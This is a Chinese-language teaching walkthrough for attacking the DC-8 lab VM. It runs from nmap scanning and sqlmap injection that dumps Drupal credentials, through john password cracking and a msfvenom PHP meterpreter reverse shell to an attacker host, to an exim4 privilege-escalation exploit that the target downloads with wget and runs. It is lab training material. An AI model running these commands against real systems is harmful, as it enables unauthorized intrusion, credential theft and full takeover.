DC-8 靶机渗透测试详细教学文档<\/h1>

1. 靶机环境准备<\/h2>
使用以下命令发现目标IP地址:<\/p>
arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 192.168.0.0\/24
<\/span><\/span><\/code><\/pre>假设发现目标IP为: 192.168.0.105<\/code><\/p>
2.2 端口扫描<\/h3>
nmap -p- 192.168.0.105
<\/span><\/span><\/code><\/pre>扫描结果显示开放了:<\/p>

80端口(HTTP服务)<\/li>
22端口(SSH服务)<\/li>
<\/ul>
2.3 服务版本探测<\/h3>
nmap -p80 -sV -A 192.168.0.105
<\/span><\/span><\/code><\/pre>2.4 Web指纹识别<\/h3>
whatweb http:\/\/192.168.0.105
<\/span><\/span><\/code><\/pre>识别出网站使用Drupal CMS搭建<\/p>
3. Web渗透阶段<\/h2>
3.1 SQL注入漏洞发现<\/h3>
访问网站后，发现URL中有nid<\/code>参数:<\/p>
http:\/\/192.168.0.105\/?nid=1
<\/code><\/pre>
尝试修改nid参数值，观察响应变化，可能存在SQL注入漏洞。<\/p>
3.2 使用sqlmap进行自动化注入测试<\/h3>

获取当前数据库:<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.0.105\/?nid=1"<\/span> --random-agent --level 3<\/span> --risk 3<\/span> --current-db --is-dba --batch --dbs
<\/span><\/span><\/code><\/pre>结果:<\/p>

当前数据库: d7db<\/code><\/li>
不是DBA权限<\/li>
<\/ul>

枚举数据库中的表:<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.0.105\/?nid=1"<\/span> --random-agent --level 3<\/span> --risk 3<\/span> --current-db --is-dba -D d7db --tables
<\/span><\/span><\/code><\/pre>
查看users表的列:<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.0.105\/?nid=1"<\/span> --random-agent --level 3<\/span> --risk 3<\/span> --current-db --is-dba -D d7db -T users --columns
<\/span><\/span><\/code><\/pre>
提取用户名和密码:<\/li>
<\/ol>
sqlmap -u "http:\/\/192.168.0.105\/?nid=1"<\/span> --random-agent --level 3<\/span> --risk 3<\/span> --current-db --is-dba -D d7db -T users -C "name,pass"<\/span> --dump
<\/span><\/span><\/code><\/pre>3.3 密码破解<\/h3>
将获取的hash保存到文件(如1.txt<\/code>)，使用john进行破解:<\/p>
john 1.txt
<\/span><\/span><\/code><\/pre>结果:<\/p>

用户john<\/code>的密码被破解为turtle<\/code><\/li>
<\/ul>
3.4 后台发现与登录<\/h3>
使用dirsearch进行目录扫描:<\/p>
dirsearch -u http:\/\/192.168.0.105\/ -i 200<\/span>
<\/span><\/span><\/code><\/pre>发现后台登录页面后，使用获取的凭据登录:<\/p>

用户名: john<\/code><\/li>
密码: turtle<\/code><\/li>
<\/ul>
4. 获取Shell<\/h2>
4.1 生成PHP反弹shell<\/h3>
使用msfvenom生成PHP反弹shell代码:<\/p>
msfvenom -p php\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.0.106 LPORT=<\/span>8888<\/span> -f raw
<\/span><\/span><\/code><\/pre>将生成的PHP代码插入到网站中可以执行PHP代码的地方(如某些表单或模块配置中)<\/p>
4.2 设置监听<\/h3>
在攻击机上设置Metasploit监听:<\/p>
msfconsole
<\/span><\/span>use exploit\/multi\/handler
<\/span><\/span>set payload php\/meterpreter\/reverse_tcp
<\/span><\/span>set lhost 0.0.0.0
<\/span><\/span>set lport 8888<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>成功获取www-data权限的shell<\/p>
4.3 稳定shell<\/h3>
在获取的shell中执行:<\/p>
python -c "import pty;pty.spawn('\/bin\/bash')"<\/span>
<\/span><\/span><\/code><\/pre>5. 权限提升<\/h2>
5.1 查找SUID文件<\/h3>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现exim4<\/code>可能存在问题<\/p>
5.2 检查exim4版本<\/h3>
exim4 --version
<\/span><\/span><\/code><\/pre>5.3 搜索exim4漏洞<\/h3>
searchsploit exim 4<\/span>
<\/span><\/span><\/code><\/pre>找到相关漏洞利用脚本: 46996.sh<\/code><\/p>
5.4 下载并执行exp<\/h3>

在攻击机上:<\/li>
<\/ol>
cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/46996.sh \/opt\/exp.sh
<\/span><\/span>python -m http.server 8080<\/span>
<\/span><\/span><\/code><\/pre>
在靶机上:<\/li>
<\/ol>
wget http:\/\/192.168.0.106:8080\/exp.sh
<\/span><\/span>chmod 755<\/span> exp.sh
<\/span><\/span>.\/exp.sh -m netcat
<\/span><\/span><\/code><\/pre>成功获取root权限<\/p>
6. 总结<\/h2>
完整渗透流程:<\/p>

主机发现 → 2. 端口扫描 → 3. 服务探针 → 4. 指纹识别 →<\/li>
发现SQL注入点 → 6. 获取凭据 → 7. 登录后台 →<\/li>
上传PHP反弹shell → 9. 获取初始访问 → 10. 提权(root)<\/li>
<\/ol>
关键点:<\/p>

通过nid参数发现SQL注入漏洞<\/li>
使用sqlmap提取数据库中的用户凭据<\/li>
通过john破解hash获取后台访问权限<\/li>
利用exim4的SUID漏洞进行提权<\/li>
<\/ul>
DC-8 靶机渗透测试详细教学文档<\/h1>

2. 信息收集阶段<\/h2>

3. Web渗透阶段<\/h2>

4. 获取Shell<\/h2>

5. 权限提升<\/h2>
